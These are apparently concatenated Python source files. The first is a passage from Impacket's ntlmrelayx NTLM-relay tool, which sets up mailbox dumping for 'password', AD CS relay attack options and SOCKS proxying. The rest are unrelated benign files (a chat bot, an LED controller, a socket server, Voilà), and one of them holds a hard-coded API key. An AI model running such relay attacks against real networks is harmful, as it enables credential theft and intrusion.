imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
# AD CS options
adcsoptions = parser.add_argument_group("AD CS attack options")
adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if not options.no_wcf_server:
RELAY_SERVERS.append(WCFRelayServer)
if not options.no_raw_server:
RELAY_SERVERS.append(RAWRelayServer)
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
__init__.py
|
# coding=utf-8
from collections import defaultdict
from logging import getLogger
import traceback
import threading
import re
from nekbot import settings
from nekbot.core.commands.argparse import ArgParse
from nekbot.core.commands.doc import Doc
from nekbot.core.exceptions import PrintableException
from nekbot.utils.decorators import optional_args
from nekbot.utils.strings import split_arguments, highlight_occurrence, limit_context, in_str_no_case
__author__ = 'nekmo'
logger = getLogger('nekbot.core.commands')
class Command(object):
symbol = True
_doc = None
def __init__(self, name=None, function=None, symbol=None, *args, **kwargs):
self.name = name
self.function = function
self.symbol = symbol if symbol is not None else self.symbol
self.argparse = self.get_argparse(args, kwargs, function)
self._args = args
self._kwargs = kwargs # TODO el orden es importante
def get_argparse(self, arg_types, kwargs, function):
argparse = ArgParse()
argparse.set_arg_types(arg_types)
argparse.set_from_function(function)
argparse.set_kwargs(kwargs, function)
# argparse.get_from_function(self.function)
return argparse
def get_doc(self):
doc = Doc(self.name, repr(self))
doc.set_arg_types(self._args)
doc.set_from_function(self.function)
self._doc = doc
return doc
@property
def doc(self):
if self._doc is not None: return self._doc
self._doc = str(self.get_doc())
return self._doc
def execute(self, msg):
if not hasattr(msg, 'args'):
msg.args = split_arguments(msg.body)[1:]
if '--help' in msg.args or '-h' in msg.args:
# Return documentation.
msg.reply(str(self.get_doc()))
return
try:
args = self.argparse.parse(msg.args, msg)
except Exception as e:
return msg.short_reply(e)
try:
self.control(msg)
except PrintableException as e:
return msg.user.send_warning(e)
try:
response = self.function(msg, *args)
except PrintableException as e:
response = unicode(e)
except Exception:
logger.error(traceback.format_exc())
msg.user.send_warning('El comando %s no finalizó correctamente.' % repr(self))
return
if response is not None:
msg.reply(response)
def control(self, msg):
if hasattr(self.function, 'control'):
return self.function.control.check(msg)
if hasattr(self.function, 'command_decorator') and \
hasattr(self.function.command_decorator, 'control'):
return self.function.command_decorator.control.check(msg)
return True
def __repr__(self):
if self.symbol:
return settings.SYMBOL + self.name
else:
return self.name
class Commands(defaultdict):
def __init__(self):
super(Commands, self).__init__(list)
def incoming(self, msg):
if msg.is_from_me:
return
if not msg.body.startswith(settings.SYMBOL):
return
if msg.historical:
return
args = split_arguments(msg.body)
if not args[0] in self:
# No es un comando, se ignora
return
cmd, args = args[0], args[1:]
msg.args = args
for command in self[cmd]:
l = threading.Thread(target=command.execute, args=(msg,))
l.start()
def add_command(self, name, function, *args, **kwargs):
cmd = Command(name, function, *args, **kwargs)
self[repr(cmd)].append(cmd)
def search(self, term):
results_cmd = []
results_doc = []
for cmd_repr in self.keys():
if not in_str_no_case(term, cmd_repr):
continue
results_cmd.append("%s (%s)" % (cmd_repr, highlight_occurrence(cmd_repr, term)))
for command_list in self.values():
for command in command_list:
if not in_str_no_case(term, command.doc):
continue
context = limit_context(term, command.doc)
results_doc.append("%s (%s)" % (
repr(command), highlight_occurrence(context, term)
))
return results_cmd, results_doc
cmds = Commands()
@optional_args
def command(func, *args, **kwargs):
return func(*args, **kwargs)
@optional_args
class command:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
if len(args) > 1:
name = args[1]
else:
name = args[0].func_name
args[0].command_decorator = self
self.name = name
cmds.add_command(name, args[0], *args[1:], **kwargs)
def __repr__(self):
return '<@Command %s>' % self.name
def __call__(self, func):
return func(*self.args, **self.kwargs)
|
multiprocessing.py
|
from multiprocessing import Queue, JoinableQueue
import torch
from PIL import Image
from torch import multiprocessing
from torchvision.transforms import Compose, Resize, ToTensor, ColorJitter
torch.set_num_threads(1)
T = Compose([Resize((224, 224)), ColorJitter(brightness=[0.8, 1.6]), ToTensor()])
def read_img(
path_queue: multiprocessing.JoinableQueue, data_queue: multiprocessing.SimpleQueue
):
torch.set_num_threads(1)
while True:
img_path = path_queue.get()
img = Image.open(img_path)
data_queue.put(T(img))
path_queue.task_done()
def read_img2(img_path):
img = Image.open(img_path)
return T(img)
class multiprocessing_mapping(object):
def __init__(self, num_workers=4, transform=read_img) -> None:
super().__init__()
self.num_workers = num_workers
self.transform = transform
self.data_queue = Queue()
self.path_queue = JoinableQueue()
self.path_queue.cancel_join_thread()
self.workers = [
multiprocessing.Process(
target=self.transform, args=(self.path_queue, self.data_queue)
)
for _ in range(self.num_workers)
]
for w in self.workers:
w.daemon = True # ensure that the worker exits on process exit
w.start()
def __call__(self, img_path_list):
for i in img_path_list:
self.path_queue.put(i)
self.path_queue.join()
return [self.data_queue.get() for _ in range(len(img_path_list))]
|
deletionwatcher.py
|
# coding=utf-8
import json
import os.path
import requests
import time
import threading
# noinspection PyPackageRequirements
import websocket
# noinspection PyPackageRequirements
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import chatcommunicate
import metasmoke
from globalvars import GlobalVars
import datahandling
from helpers import log
from parsing import fetch_post_id_and_site_from_url, to_protocol_relative
from tasks import Tasks
PICKLE_FILENAME = "deletionIDs.p"
# noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters
class DeletionWatcher:
next_request_time = time.time() - 1
def __init__(self):
if GlobalVars.no_deletion_watcher:
return
self.posts = {}
self.posts_lock = threading.Lock()
self.save_handle = None
self.save_handle_lock = threading.Lock()
try:
self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/")
except websocket.WebSocketException:
self.socket = None
log('error', 'DeletionWatcher failed to create a websocket connection')
return
if datahandling.has_pickle(PICKLE_FILENAME):
pickle_data = datahandling.load_pickle(PICKLE_FILENAME)
for post in DeletionWatcher._check_batch(pickle_data):
self.subscribe(post, pickle=False)
self._schedule_save()
threading.Thread(name="deletion watcher", target=self._start, daemon=True).start()
def _start(self):
while True:
msg = self.socket.recv()
if msg:
msg = json.loads(msg)
action = msg["action"]
if action == "hb":
self.socket.send("hb")
else:
data = json.loads(msg["data"])
if data["a"] == "post-deleted":
try:
with self.posts_lock:
post_id, _, _, post_url, callbacks = self.posts[action]
if post_id == str(data["aId"] if "aId" in data else data["qId"]):
with self.posts_lock:
del self.posts[action]
Tasks.do(self._unsubscribe, action)
Tasks.do(metasmoke.Metasmoke.send_deletion_stats_for_post, post_url, True)
for callback, max_time in callbacks:
if not max_time or time.time() < max_time:
callback()
except KeyError:
pass
def subscribe(self, post_url, callback=None, pickle=True, timeout=None):
if GlobalVars.no_deletion_watcher:
return
post_id, post_site, post_type = fetch_post_id_and_site_from_url(post_url)
with GlobalVars.site_id_dict_lock:
site_id = GlobalVars.site_id_dict.get(post_site, None)
if not site_id:
log("warning", "unknown site {} when subscribing to {}".format(post_site, post_url))
return
if post_type == "answer":
question_id = datahandling.get_post_site_id_link((post_id, post_site, post_type))
if question_id is None:
return
else:
question_id = post_id
action = "{}-question-{}".format(site_id, question_id)
max_time = (time.time() + timeout) if timeout else None
with self.posts_lock:
if action not in self.posts:
self.posts[action] = (post_id, post_site, post_type, post_url,
[(callback, max_time)] if callback else [])
Tasks.do(self._subscribe, action)
elif callback:
_, _, _, _, callbacks = self.posts[action]
callbacks.append((callback, max_time))
else:
return
if pickle:
self._schedule_save()
def _subscribe(self, action):
if self.socket:
try:
self.socket.send(action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to subscribe to {}'.format(action))
else:
log('warning', 'DeletionWatcher tried to subscribe to {}, but no WebSocket available.'.format(action))
def _schedule_save(self):
with self.save_handle_lock:
if self.save_handle:
self.save_handle.cancel()
save_handle = Tasks.do(self._save)
def _save(self):
pickle_output = {}
with self.posts_lock:
for post_id, post_site, _, _, _ in self.posts.values():
if post_site not in pickle_output:
pickle_output[post_site] = [post_id]
else:
pickle_output[post_site].append(post_id)
datahandling.dump_pickle(PICKLE_FILENAME, pickle_output)
@staticmethod
def _check_batch(saved):
if time.time() < DeletionWatcher.next_request_time:
time.sleep(DeletionWatcher.next_request_time - time.time())
for site, posts in saved.items():
ids = ";".join(post_id for post_id in posts if not DeletionWatcher._ignore((post_id, site)))
uri = "https://api.stackexchange.com/2.2/posts/{}".format(ids)
params = {
'site': site,
'key': 'IAkbitmze4B8KpacUfLqkw(('
}
res = requests.get(uri, params=params)
json = res.json()
if "items" not in json:
log('warning',
'DeletionWatcher API request received no items in response (code {})'.format(res.status_code))
log('warning', res.text)
return
if 'backoff' in json:
DeletionWatcher.next_request_time = time.time() + json['backoff']
for post in json['items']:
if time.time() - post["creation_date"] < 7200:
yield to_protocol_relative(post["link"]).replace("/q/", "/questions/")
def _unsubscribe(self, action):
if self.socket:
try:
self.socket.send("-" + action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to unsubscribe to {}'.format(action))
else:
log('warning', 'DeletionWatcher tried to unsubscribe to {}, but no WebSocket available.'.format(action))
@staticmethod
def _ignore(post_site_id):
return datahandling.is_false_positive(post_site_id) or datahandling.is_ignored_post(post_site_id) or \
datahandling.is_auto_ignored_post(post_site_id)
|
LedHandler.py
|
import time
import LogHandler
mylogger = LogHandler.LogHandler("ledhandler")
try:
import RPi.GPIO as GPIO
except RuntimeError:
mylogger.logger.error("Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script")
import threading
class LedHandler():
def __init__(self, channel, freq=300):
self.channel = channel
self.dc = 0 # where dc is the duty cycle (0.0 <= dc <= 100.0)
frequency = freq # Hz
self.dc_target = self.dc
# set gpio
GPIO.setmode(GPIO.BOARD)
GPIO.setup(channel, GPIO.OUT, initial=GPIO.LOW)
self.pin = GPIO.PWM(channel, frequency)
# start pwm
self.start(self.dc)
mylogger.logger.info('LedHandler object is created')
def led_dc_controller(self, dc, mode="grad"):
self.dc_target = dc
if mode == "grad":
actual_led = threading.Thread(target=self.set_dc_with_gradient_thrd)
actual_led.daemon = True
actual_led.start()
if mode == "dc":
actual_led = threading.Thread(target=self.set_dc_thrd)
actual_led.daemon = True
actual_led.start()
def set_dc_with_gradient_thrd(self):
self.set_dc_with_gradient(self.dc_target)
def set_dc_thrd(self):
self.set_dc(self.dc_target)
# SET DUTY CYCLE
def set_dc(self, dc):
self.dc = dc
self.pin.ChangeDutyCycle(self.dc)
mylogger.logger.info('Change duty cycle: ' + str(self.dc))
# SET DC WITH DIM EFFECT
def set_dc_with_gradient(self, dc):
dc = int(dc)
step = 3
step_delay = 0.02
mylogger.logger.info('Make gradient: {} to {}'.format(self.dc, dc))
if dc > self.dc:
for grad in range(self.dc, dc+1, step):
time.sleep(step_delay)
self.set_dc(grad)
#print(grad)
self.set_dc(dc)
if dc < self.dc:
for grad in range(self.dc, dc-1, -step):
time.sleep(step_delay)
self.set_dc(grad)
#print(grad)
self.set_dc(dc)
if dc == self.dc:
self.set_dc(dc)
# STOP PWM
def stop(self):
self.pin.stop()
mylogger.logger.info('stoping pwd')
# START PWM
def start(self, dc=None):
if dc is None:
dc = self.dc
mylogger.logger.info('set dc from self.dc: ' + str(dc))
self.pin.start(dc)
mylogger.logger.info('Start PWM')
def __del__(self):
try:
print('kill object: stop and cleanup')
self.pin.stop()
GPIO.cleanup(self.channel)
except Exception as e:
print(e)
finally:
GPIO.cleanup(self.channel)
if __name__ == "__main__":
green = LedHandler(channel=12)
time.sleep(1)
#green.set_dc_with_gradient(50)
green.led_dc_controller(50)
time.sleep(5)
#green.set_dc_with_gradient(100)
green.led_dc_controller(100)
time.sleep(5)
#green.set_dc_with_gradient(50)
green.led_dc_controller(50)
time.sleep(5)
#green.set_dc_with_gradient(0)
green.led_dc_controller(0)
time.sleep(1)
input()
|
server.py
|
from socket import socket, AF_INET, SOCK_STREAM, timeout
from threading import Thread
from helper import *
class Server:
def __init__(self, address, port):
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.bind((address, port))
self.sock.listen()
print("server started at " + str(address) + ":" + str(port))
def handler(self, connection, address):
print("established connection from {}:{}".format(*address))
phase = 0
username_hash = 0
first_position = 0, 0
second_position = 0, 0
actual_position = 0, 0
direction = 4
picked = False
last_action = None
recharging = False
temp_data = ""
processed = False
try:
while True:
if not processed:
data = connection.recv(1024).decode("utf-8")
# print(data)
temp_data += data
before, sep, after = temp_data.partition("\a\b")
syntax_check(before, phase, last_action, sep)
if sep == "":
continue
decoded = before
temp_data = after
print("Received: ", decoded, sep="")
if before and after and "\a\b" in after:
processed = True
else:
processed = False
if decoded == "RECHARGING":
connection.settimeout(TIMEOUT_RECHARGING)
recharging = True
continue
if decoded == "FULL POWER":
recharging = False
connection.settimeout(TIMEOUT)
continue
if recharging:
connection.sendall(create_message(SERVER_LOGIC_ERROR))
break
if phase == 0:
username_hash = compute_hash(decoded)
print("Sending: ", username_hash, sep="")
connection.sendall(create_message((username_hash + SERVER_KEY) % 65536))
phase = 1
elif phase == 1:
if (int(decoded) + 65536 - CLIENT_KEY) % 65536 == username_hash:
print("Sending: ", SERVER_OK, sep="")
connection.sendall(create_message(SERVER_OK))
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
phase = 2
else:
print("Sending: ", SERVER_LOGIN_FAILED, sep="")
connection.sendall(create_message(SERVER_LOGIN_FAILED))
break
elif phase == 2:
if "OK" in decoded:
split = decoded.split(" ")
first_position = int(split[1]), int(split[2])
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
phase = 3
elif phase == 3:
if "OK" in decoded:
split = decoded.split(" ")
second_position = int(split[1]), int(split[2])
if second_position != first_position:
actual_position = second_position
direction = get_direction(first_position, second_position)
print("Coordinates = ", actual_position, sep="")
print("Direction = ", direction, sep="")
phase = 4
else:
first_position = second_position
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
if phase == 4:
if actual_position == (-2, 2):
phase = 5
else:
split = decoded.split(" ")
actual_position = (int(split[1]), int(split[2]))
move, actual_position, direction = get_next_move(actual_position, direction)
print("Sending: ", move, sep="")
print("Position: ", actual_position, " Direction: ", direction, sep="")
last_action = move
connection.sendall(create_message(move))
if phase == 5:
if picked and decoded != "" and last_action != SERVER_TURN_RIGHT and last_action != SERVER_TURN_LEFT:
phase = 42
else:
action, actual_position, direction, picked = search_box(actual_position, direction, picked)
print("Sending: ", action, sep="")
print("Position: ", actual_position, " Direction: ", direction)
last_action = action
connection.sendall(create_message(action))
if phase == 42:
print("Sending: ", SERVER_LOGOUT, sep="")
connection.sendall(create_message(SERVER_LOGOUT))
break
except timeout as e:
print("Timeout!")
except InvalidMessage as e:
print("Sending: ", SERVER_SYNTAX_ERROR, sep="")
print(e, sep="")
connection.sendall(create_message(SERVER_SYNTAX_ERROR))
finally:
connection.close()
def run(self):
while True:
connection, address = self.sock.accept()
connection.settimeout(TIMEOUT)
t = Thread(target=self.handler, args=(connection, address))
t.start()
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import AsyncMappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporry connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = AsyncMappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
